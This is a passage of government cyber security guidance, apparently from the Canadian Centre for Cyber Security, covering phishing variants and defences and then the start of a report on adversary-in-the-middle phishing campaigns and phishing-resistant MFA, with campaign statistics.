believe they are legitimate. Voices generated by artificial intelligence (AI) can sound like family members or friends.</p> <p>A vishing scheme may also target the victim’s voice. In this instance, the threat actor collects a sample of the victim’s voice to conduct fraud (for example, to use the sample for voice authentication to access an account).</p> <h3>Angler phishing</h3> <p>Angler phishing is an emerging cyber threat that leverages social media platforms to post attractive but false information to “lure” targets into initiating contact. Threat actors may impersonate legitimate companies or brands through fake accounts, posts, direct messages or ads. They often create fake customer support profiles or use social media interactions (for example, responding to complaints or questions) to convince users to click on malicious links, visit counterfeit websites or share personal details.</p> <p>This is a powerful attack because the target initiates contact with the threat actor—bypassing trust concerns—and provides an immediate and active interaction, rather than a passive and delayed interaction.</p> <h3>Catfishing</h3> <p>Catfishing is typically conducted through online platforms like dating websites. The threat actor fakes an identity or creates a persona to gain the target’s trust and defraud or extort them. The threat actor, or catfish, generally makes excuses to avoid in-person interactions. One of the more common forms of catfishing involves tricking the victim into an online romantic relationship.</p> <h3>Pharming</h3> <p>Pharming is a more advanced technique in which cybercriminals try to redirect users to fake websites that look identical to legitimate ones, like online banking sites, e-commerce platforms or social media networks. The goal of these attacks is to trick users into providing sensitive or personal information, such as usernames, passwords or credit card numbers.</p> <p>While phishing relies on emails or messages to trick users into providing personal information, pharming uses malware or manipulates domain name systems (DNS) to redirect users to fraudulent websites designed to capture their personal information.</p> <h2 class="text-info" id="2">Artificial intelligence and phishing</h2> <p><abbr title="artificial intelligence">AI</abbr> is rapidly reshaping the cyber security landscape, introducing enhanced capabilities for defence and new avenues for exploitation. One concerning emerging threat is the use of <abbr title="artificial intelligence">AI</abbr> to automate and refine phishing attacks. <abbr title="artificial intelligence">AI</abbr> enhances the effectiveness of phishing attacks and reduces the time and effort needed for threat actors to conduct these attacks.</p> <p>Recent advances in generative <abbr title="artificial intelligence">AI</abbr> make it more difficult for users to identify phishing attempts. Generative <abbr title="artificial intelligence">AI</abbr> can be used to produce highly realistic content, including text, images, video and audio. The content is enhanced and is more realistic, making it harder to distinguish between fraudulent and legitimate communications.</p> <p><abbr title="artificial intelligence">AI</abbr> also enables threat actors to gather and analyze publicly available data on potential targets, allowing them to craft highly personalized spear phishing and whaling messages.</p> <p>These messages can be tailored to reflect individual interests, online activity, familial connections or professional relationships—substantially increasing the likelihood of victims engaging with the threat actor.</p> <p><abbr title="artificial intelligence">AI</abbr> is also playing a critical role in strengthening our cyber defences. Sophisticated <abbr title="artificial intelligence">AI</abbr>-based intrusion detection systems can analyze large volumes of data, assess user behaviour, examine metadata and message content, and identify anomalies that may indicate a threat. These systems enable faster, more accurate identification and mitigation of phishing attempts and other cyber risks. As the threat landscape evolves, organizations must continue to invest in both <abbr title="artificial intelligence">AI</abbr> technology and <abbr title="artificial intelligence">AI</abbr> awareness to stay ahead of increasingly sophisticated attacks.</p> <h2 class="text-info" id="3">How to identify a phishing attack</h2> <p>Phishing attacks can be delivered in many ways, but they all play on trust, urgency and other aspects of human psychology. Fear, excitement, authority, curiosity and trust could all be reactions to a phishing message. Phishing attacks typically follow a similar sequence. Knowing how to identify these steps can help protect your organization against phishing.</p> <h3>Step 1: The bait</h3> <p>As described above, there are many ways that the threat actor can set the bait. They may craft a message that appears to come from a well-known bank or service provider. They use spoofing techniques and send the message to numerous recipients in the hope that some will take the bait.</p> <p>In spear phishing and whaling attacks, the threat actor first gathers details about the target. For example, they harvest information from social media profiles, company websites and Internet activity to create a customized message.</p> <p>In vishing attacks, the threat actor might use a computerized auto-dialler (known as a robocall) or an <abbr title="artificial intelligence">AI</abbr>-generated voice of a known person to deliver the fraudulent message to many victims.</p> <h3>Step 2: The hook</h3> <p>The hook occurs when the victim believes the message is from a trusted source and the message contains information that entices the victim to take immediate action. For example, the message may ask the user to resolve an urgent issue with their account.</p> <p>If the victim clicks the link in the message, they will unknowingly be redirected to the threat actor’s fake version of the real website. The victim provides sensitive information, such as login credentials, which is sent to the threat actor. If the victim opens an infected attachment, their device may become infected if the malicious code executes.</p> <h3>Step 3: The attack</h3> <p>Threat actors can use stolen user credentials to access the victim’s accounts. They may use an infiltrated email account to send more phishing emails to the victim’s contacts. If the victim has privileged access (for example, to an organization or company account, system or network), the threat actor could gain access to sensitive corporate data and critical systems.</p> <p>If a threat actor successfully deploys malware to your organization’s network or systems, they can use it to gain control of devices, steal data or deny access to files—for example, by encrypting them—until a ransom is paid.</p> <h3>Phishing characteristics</h3> <p>Although <abbr title="artificial intelligence">AI</abbr> is making it hard to detect certain phishing characteristics, such as poor spelling or a robotic tone, there are other signs to be aware of.</p> <p>Something may be <strong>phishy</strong> if:</p> <ul><li>the sender makes an urgent request with a deadline</li> <li>the sender requests your personal or confidential information</li> <li>the sender asks you to log in via a provided link</li> <li>the offer sounds too good to be true</li> <li>the communication is unsolicited and includes: <ul><li>attachments</li> <li>links to websites or web forms (these may be spoofed)</li> <li><abbr title="quick response">QR</abbr> codes</li> <li>login pages</li> <li>a claim to be government or bank officials</li> </ul></li> <li>you don’t recognize the sender <ul><li>remember, addresses can be spoofed</li> <li>a known sender isn’t necessarily a trusted sender</li> </ul></li> </ul><h2 class="text-info" id="4">How to protect your organization from phishing</h2> <p>You can protect your organization’s information and infrastructure from phishing attacks by:</p> <ul><li>using trusted anti-phishing technology, such as the <a href="https://www.cira.ca/en/cybersecurity/">Canadian Internet Registration Authority (CIRA) Canadian Shield</a> <abbr title="domain name systems">DNS</abbr> resolver</li> <li>using anti-phishing software that aligns with the <a href="https://dmarc.org/">Domain-based Message Authentication, Reporting, and Conformance (DMARC) policy</a></li> <li>backing up information so that you have another copy</li> <li>applying software updates and patches</li> <li>blocking <abbr title="internet protocol">IP</abbr> addresses, domain names and file types that are known to be malicious</li> <li>favouring in-person interactions, using cash and meeting in the office whenever possible; threat actors will try to find ways to avoid in-person interactions</li> <li>establishing protocols and procedures for your employees to verify and report suspicious communications internally</li> <li>using multi-factor authentication (MFA) on all systems, especially on shared corporate media accounts</li> <li>updating your organization’s incident response plan to include steps to take in response to a successful phishing attack</li> </ul><p>Your employees can reduce their risk of falling victim to a phishing attack by:</p> <ul><li>remaining calm; phishing depends on creating a sense of urgency</li> <li>avoiding sending sensitive information by email or text</li> <li>reducing the amount of personal information they post online</li> <li>enabling a spam blocker in their mobile device application settings</li> <li>avoiding using any form of simplified contact response, such as clicking on hyperlinks, loading <abbr title="quick response">QR</abbr> codes or replying to suspicious texts</li> <li>filtering spam emails (unsolicited junk emails sent in bulk)</li> <li>verifying the sender’s legitimacy by contacting the sender through a separate channel, for example: <ul><li>if they receive a call from their bank, hanging up and visiting or calling their local branch</li> <li>if they receive an email from their Internet service provider, contacting the service provider through their web form</li> <li>if they receive a text from a company or provider on their phone, responding by email from their computer</li> </ul></li> <li>avoiding <abbr title="short message service">SMS</abbr> over the air, flash call (a near-instant dropped call that is automatically placed to a mobile number) and <abbr title="short message service">SMS</abbr> as an <abbr title="multi-factor authentication">MFA</abbr> method</li> </ul><h3>Training and awareness</h3> <p>Employees should understand the importance of protecting their personal information and the organization’s information. Employees who are unaware of the signs of a social engineering attack might reveal information, whether sensitive or not. They may also unknowingly infect organizational devices, systems and networks.</p> <p>Phishing attacks are less likely to be successful when your workforce is informed and has received training on how to handle personal information, such as privacy awareness training, and on cyber security best practices. Organizations should also conduct internal phishing simulations to enhance employees’ understanding of the risks. This will help employees detect and avoid phishing attacks in a safe environment.</p> <p>Organizations can discuss smishing and vishing protection mechanisms with their telecommunications providers. Often, mobile network operators are better positioned to block attempts before these attempts reach users.</p> <h2 class="text-info" id="5">Learn more</h2> <ul><li><a href="/en/guidance/tips-backing-your-information-itsap40002">Tips for backing up your information (ITSAP.40.002)</a></li> <li><a href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a></li> <li><a href="/en/guidance/protect-your-organization-malware-itsap00057">Protect your organization from malware (ITSAP.00.057)</a></li> <li><a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP 30.030)</a></li> <li><a href="/en/guidance/spotting-malicious-email-messages-itsap00100">Spotting malicious email messages (ITSAP.00.100)</a></li> <li><a href="/en/guidance/implementation-guidance-email-domain-protection">Implementation guidance: email domain protection (ITSP.40.065 v1.1)</a></li> <li><a href="/en/guidance/security-considerations-qr-codes-itsap00141">Security considerations for <abbr title="quick response">QR</abbr> codes (ITSAP.00.141)</a></li> </ul></div> </div> </div> </div> </div> </article>

This joint guidance provides recommendations to Internet service providers (ISPs) and network defenders to mitigate potential cybercriminal activity enabled by BPH providers.

This joint guidance provides security best practices to help administrators harden on-premises Exchange servers by enforcing a prevention posture and hardening authentication and encryption.

<article data-history-node-id="6927" about="/en/guidance/defending-against-adversary-middle-threats-phishing-resistant-multi-factor-authentication-itsm30031" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>October 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.30.031</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>October 2025 | Management series</strong></p> </div> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsm.30.031-e.pdf">Defending against adversary-in-the-middle threats with phishing-resistant multi-factor authentication – ITSM.30.031 (PDF, 1.5 MB)</a></p> </div> <h2 class="text-info mrgn-tp-0" id="0">Overview</h2> <p>In the ever-evolving landscape of cyber security, the rise of adversary-in-the-middle (AitM) phishing poses a significant threat to organizations. <abbr title="adversary-in-the-middle">AitM</abbr> phishing has become increasingly popular among threat actors as organizations move to the cloud, shifting the frontline from defending traditional network perimeters to prioritizing identity protection.</p> <p>Security requirements have grown increasingly complex, particularly in cloud environments, and threat actors have refined their tactics. As a result, implementing phishing-resistant multi-factor authentication (MFA) is critical for organizations to maintain strong cyber security.</p> <p>This publication provides details on observed <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns to highlight their prevalence and demonstrate the risk of leaving cloud accounts vulnerable. All findings in this publication are based on over 100 campaigns that the Canadian Centre for Cyber Security (Cyber Centre) detected targeting Microsoft Entra ID accounts between 2023 and early 2025. Although this is not a comprehensive overview of all <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns happening globally, it offers a snapshot of how widespread these campaigns have become.</p> <p>This publication aims to:</p> <ul><li>provide a comprehensive understanding of where these threats originate</li> <li>highlight the need for all organizations to strengthen defences by employing phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> by default</li> <li>provide recommendations to enhance organizations’ security postures against these sophisticated campaigns</li> </ul></div> </div> <section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled"><li><a href="#0">Overview</a></li> <li><a href="#1">Understanding adversary-in-the-middle phishing and its impact</a></li> <li><a href="#2">Transition to proxy-based adversary-in-the-middle phishing</a></li> <li><a href="#3">Adversary-in-the-middle phishing trends and techniques</a> <ul><li><a href="#3.1">Business email compromise phishing campaigns</a></li> <li><a href="#3.2">Living off trusted sites techniques</a></li> </ul></li> <li><a href="#4">Targeted sectors</a></li> <li><a href="#5">The importance of phishing-resistant multi-factor authentication</a></li> <li><a href="#6">Enhancing defences against evolving adversary-in-the-middle threats</a> <ul><li><a href="#6.1">Addressing high-risk gaps and vulnerabilities</a></li> <li><a href="#6.2">Educating employees</a></li> </ul></li> <li><a href="#7">Summary</a></li> </ul></details></section><section><h2 class="text-info" id="1">Understanding adversary-in-the-middle phishing and its impact</h2> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing is a technique where a threat actor intercepts the connection between a user and a login server. The threat actor captures all usernames, passwords, <abbr title="multi-factor authentication">MFA</abbr> secrets and tokens transferred over that connection. Users typically receive a phishing email with a link to a malicious phishing site impersonating a legitimate website. The user is then tricked into providing their login details and completing the <abbr title="multi-factor authentication">MFA</abbr> process. The threat actor logs that information to impersonate the user later.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 1: Phishing campaign by threat actor</figcaption><img alt="Figure 1 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig1-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 1: Phishing campaign by threat actor</summary><p>This figure illustrates how a threat actor might route and deliver a phishing email with a link to an <abbr title="adversary-in-the-middle">AitM</abbr> phishing site.</p> <ol><li>The user receives a phishing email with a link.</li> <li>The user goes to the site, where they see what appears to be a legitimate login portal.</li> <li>The <abbr title="adversary-in-the-middle">AitM</abbr> site then proxies all connections to the login portal.</li> <li>The login portal prompts the user for multi-factor authentication (MFA).</li> <li>The user completes non-phishing-resistant <abbr title="multi-factor authentication">MFA</abbr>.</li> <li>This action returns a validated token and session cookie to the <abbr title="adversary-in-the-middle">AitM</abbr> site.</li> <li>The phishing site redirects the user to a different site that appears to be legitimate.</li> </ol></details></div> </div> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing is not a new concept. It has become increasingly popular among threat actors since organizations moved to the cloud. Before that, organizations worked hard to defend their frontline—the network perimeter—with firewalls and virtual private networks (VPNs). Now, organizations must strengthen cyber security to defend their new frontline, the cloud. To do this, they must protect cloud identity with a modernized set of tools, such as conditional access policies (CAPs) and <abbr title="multi-factor authentication">MFA</abbr>.</p> <p>It is difficult to secure a cloud environment against <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns. The cloud comes with complex security requirements that are constantly changing as threat actors increase campaigns against cloud identities. This highlights the importance of the shared responsibility model, where both clients and cloud service providers (CSPs) work together to build a robust security posture. Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> is the new industry standard. It ensures stronger identity security and is more resilient than relying solely on passwords or traditional <abbr title="multi-factor authentication">MFA</abbr> methods.</p> <p>Threat actors can execute <abbr title="adversary-in-the-middle">AitM</abbr> phishing easily by leveraging no-code solutions, such as dark web <abbr title="adversary-in-the-middle">AitM</abbr> providers or open-source <abbr title="adversary-in-the-middle">AitM</abbr> toolkits for self-run setups. These campaigns can be thwarted by:</p> <ul><li>phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> factors</li> <li>specific <abbr title="conditional access policies">CAPs</abbr> that require registered device sign-ins</li> <li>specific <abbr title="conditional access policies">CAPs</abbr> that only allow sign-ins from specific Internet Protocol (IP) ranges or addresses that an organization owns</li> </ul><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="2">Transition to proxy-based adversary-in-the-middle phishing</h2> <p>Threat actors conducting <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns evade detection by using relay proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits. A phishing kit is a pre-assembled set of digital tools that allows threat actors to easily create fake websites and harvest sensitive user information. These fake websites often mimic trusted brands to deceive users.</p> <p>Before proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits, organizations could detect <abbr title="adversary-in-the-middle">AitM</abbr> phishing by looking for suspicious logins to their cloud environment and comparing those <abbr title="internet protocol">IP</abbr> addresses with network connections from their network. A login from a suspicious <abbr title="internet protocol">IP</abbr> and network connections to a suspicious website hosted on that same <abbr title="internet protocol">IP</abbr> was a good indication of an <abbr title="adversary-in-the-middle">AitM</abbr> campaign.</p> <p>However, proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits work by adding a series of proxies in between the user and the identity provider. This means the <abbr title="internet protocol">IP</abbr> from the user login will not be the same <abbr title="internet protocol">IP</abbr> that appears to be hosting the phishing website. There are many ways that threat actors can achieve this, so organizations can no longer rely on <abbr title="internet protocol">IP</abbr>-based correlation to detect all <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns.</p> <p>In mid-2024, the Cyber Centre added new internal detection capabilities for proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing and began detecting many more campaigns. This correlated with a decline in detected traditional <abbr title="adversary-in-the-middle">AitM</abbr> phishing. Threat actors have almost entirely shifted from traditional <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns to proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 2: Comparison of detected traditional and proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns</figcaption><img alt="Figure 2 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig2-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 2: Comparison of detected traditional and proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns</summary><p>This bar graph illustrates a comparison of detected traditional and proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns, based on campaigns that the Cyber Centre was able to confidently categorize between 2023 and mid-2025.</p> <ul class="list-unstyled"><li>January 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>February 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>March 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr> 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> 0%</li> <li>April 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>May 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: NIL; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: NIL</li> <li>June 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>July 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>August 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: NIL; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: NIL</li> <li>September 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>November 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>December 2023: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>January 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>February 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>March 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>April 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>May 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 100%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 0%</li> <li>June 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 86%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 14%</li> <li>July 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 42%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 58%</li> <li>August 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>September 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>October 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 33%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 67%</li> <li>November 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 10%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 90%</li> <li>December 2024: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>January 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>February 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 33%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 67%</li> <li>March 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 10%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 90%</li> <li>April 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 0%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 100%</li> <li>May 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 16%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 84%</li> <li>June 2025: Traditional <abbr title="adversary-in-the-middle">AitM</abbr>: 12%; proxy-based <abbr title="adversary-in-the-middle">AitM</abbr>: 88%</li> </ul></details></div> </div> <p>One major contributor to this shift was threat actors’ use of a particular proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kit. For more information on this kit, refer to the <a href="https://fieldeffect.com/blog/field-effect-discovers-m365-adversary-in-the-middle-campaign">Field Effect article Field Effect discovers M365 adversary-in-the-middle campaign</a>.</p> <p>Phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> continues to prevent <abbr title="adversary-in-the-middle">AitM</abbr> campaigns, whether from traditional kits or proxy-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing kits. Both phishing-resistant <abbr title="multi-factor authentication">MFA</abbr> and registered device <abbr title="conditional access policies">CAPs</abbr> break the authentication flow when there is an <abbr title="adversary-in-the-middle">AitM</abbr> phishing kit in the middle of the connection.</p> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="3">Adversary-in-the-middle phishing trends and techniques</h2> <p><abbr title="adversary-in-the-middle">AitM</abbr> phishing kits are increasingly sophisticated and challenging to detect. It might seem logical to focus on stopping these campaigns at their source by enhancing phishing email filtering. However, threat actors know that organizations are constantly improving their phishing protection programs and are therefore adjusting their techniques.</p> <p>The Cyber Centre analyzed over 100 campaigns between 2023 and early 2025 and found that threat actors used a combination of vendor email compromise (VEC), which is a type of business email compromise (BEC), and a phishing technique that uses living off trusted sites (LOTS).</p> <h3 id="3.1">Business email compromise phishing campaigns</h3> <p>In <abbr title="business email compromise">BEC</abbr> phishing campaigns, threat actors compromise legitimate organizations, steal their trusted contacts, and send <abbr title="adversary-in-the-middle">AitM</abbr> phishing emails with links to legitimate services like SharePoint, Dropbox, or other trusted hosting providers. The files hosted on these trusted providers contain a link to the <abbr title="adversary-in-the-middle">AitM</abbr> phishing site, but the link is within a file hosted on the trusted provider, not in the phishing email itself. This makes detecting and tracking the source of an <abbr title="adversary-in-the-middle">AitM</abbr> compromise more difficult.</p> <p>From the user’s perspective, they have received an email from a trusted contact with a shared file, which they may regularly receive from this contact. Threat actors can tailor the file-sharing service based on previous communications between 2 users to make their <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns more difficult to identify.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 3: Distribution of <abbr title="business email compromise">BEC</abbr> phishing</figcaption><img alt="Figure 3 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig3-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 3: Distribution of <abbr title="business email compromise">BEC</abbr> phishing</summary><p>This pie chart shows the distribution of <abbr title="business email compromise">BEC</abbr> phishing campaigns compared to non-<abbr title="business email compromise">BEC</abbr> phishing campaigns that the Cyber Centre analyzed and categorized between 2023 and mid-2025. <abbr title="business email compromise">BEC</abbr> phishing campaigns made up 91% of the analyzed campaigns.</p> </details></div> </div> <h3 id="3.2">Living off trusted sites techniques</h3> <p><abbr title="living off trusted sites">LOTS</abbr>-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing made up over half of the campaigns that the Cyber Centre was able to categorize, with the remaining campaigns using conventional phishing methods (such as malicious links or attachments directly in an email). Organizations should educate users on the risks of <abbr title="living off trusted sites">LOTS</abbr>-based <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns and provide training on how to identify these campaigns.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 4: Distribution of phishing techniques</figcaption><img alt="Figure 4 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig4-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 4: Distribution of phishing techniques</summary><p>This pie chart shows the distribution of phishing techniques that the Cyber Centre analyzed and categorized between 2023 and mid-2025. <abbr title="living off trusted sites">LOTS</abbr> made up 59% of the analyzed campaigns while conventional phishing (such as embedded links or files) made up 41%.</p> </details></div> </div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <h2 class="text-info" id="4">Targeted sectors</h2> <p>The Cyber Centre examined the sectors and organizations that are being targeted by <abbr title="adversary-in-the-middle">AitM</abbr> phishing campaigns. In Figure 5 below, the breakdown of <abbr title="business email compromise">BEC</abbr> victims by country shows that most of the organizations that were compromised and that sent <abbr title="adversary-in-the-middle">AitM</abbr> phishing emails to the Government of Canada and to critical infrastructure partners were based in Canada. This finding underscores that threat actors are leveraging <abbr title="vendor email compromise">VEC</abbr> since many Canadian organizations predominantly interact with other Canadian organizations in their daily operations.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 5: Breakdown of <abbr title="business email compromise">BEC</abbr> victims by country</figcaption><img alt="Figure 5 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig5-itsm.30.031-e.png" /></figure><details><summary>Long description – Figure 5: Breakdown of <abbr title="business email compromise">BEC</abbr> victims by country</summary><p>This pie chart shows the breakdown of <abbr title="business email compromise">BEC</abbr> victims by country that the Cyber Centre analyzed and categorized between 2023 and mid-2025. Canada represents 77%, the United States represents 18%, and the remaining 5% is divided among other unspecified countries.</p> </details></div> </div> <p>The Cyber Centre found that a third of the <abbr title="business email compromise">BEC</abbr> victims were in the natural resources, energy, and environment sector. This was closely followed by the industry and business development sector and the Indigenous services sector.</p> <p>When examining the victims who received <abbr title="adversary-in-the-middle">AitM</abbr> phishing emails, the Cyber Centre observed a similar breakdown. A quarter of the victims were in the natural resources, energy, and environment sector, followed by the security, intelligence and defence sector; the health sector; and the government administration sector.</p> <p>The Cyber Centre can correlate the sectors affected by <abbr title="business email compromise">BEC</abbr> and those impacted by <abbr title="adversary-in-the-middle">AitM</abbr> phishing to spot patterns between the sectors sending and receiving emails. We observed that 41% of sectors impacted by <abbr title="business email compromise">BEC</abbr> also sent phishing emails to organizations within the same sector, consistent with previously cited <abbr title="vendor email compromise">VEC</abbr> findings. The graph below illustrates an example of this. Notable exceptions to this trend were the hospitality and legal sectors, likely because hotels and law firms serve clients across diverse sectors.</p> <div class="panel panel-default"> <div class="panel-body"> <figure><figcaption class="text-center">Figure 6: <abbr title="business email compromise">BEC</abbr> victims in the natural resources, energy and environment sector sending emails to <abbr title="adversary-in-the-middle">AitM</abbr> phishing victims</figcaption><img alt="Figure 6 – Long description immediately follows" class="img-responsive" src="/sites/default/files/images/fig6-itsm.30.031-e_2.png" /></figure><details><summary>Long description – Figure 6: <abbr title="business email compromise">BEC</abbr> victims in the natural resources, energy and environment sector sending emails to <abbr title="adversary-in-the-middle">AitM</abbr> phishing victims</summary><p>The figure depicts <abbr title="business email compromise">BEC</abbr> victims in the natural resources, energy and environment sector sending emails to <abbr title="adversary-in-the-middle">AitM</abbr> phishing victims. This is based on results that the Cyber Centre analyzed and categorized between 2023 and mid-2025. The natural resources, energy and environment sector sent 55% of phishing emails within its sector, 13% to the health sector, 9% to the transportation sector, 5% to the banking and finance sector, 5% to the security, intelligence and defence sector, 5% to the government administration sector, 4% to the border services and immigration sector, and 4% to the international affairs, trade and development sector.</p> </details></div> </div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info" id="5">The importance of 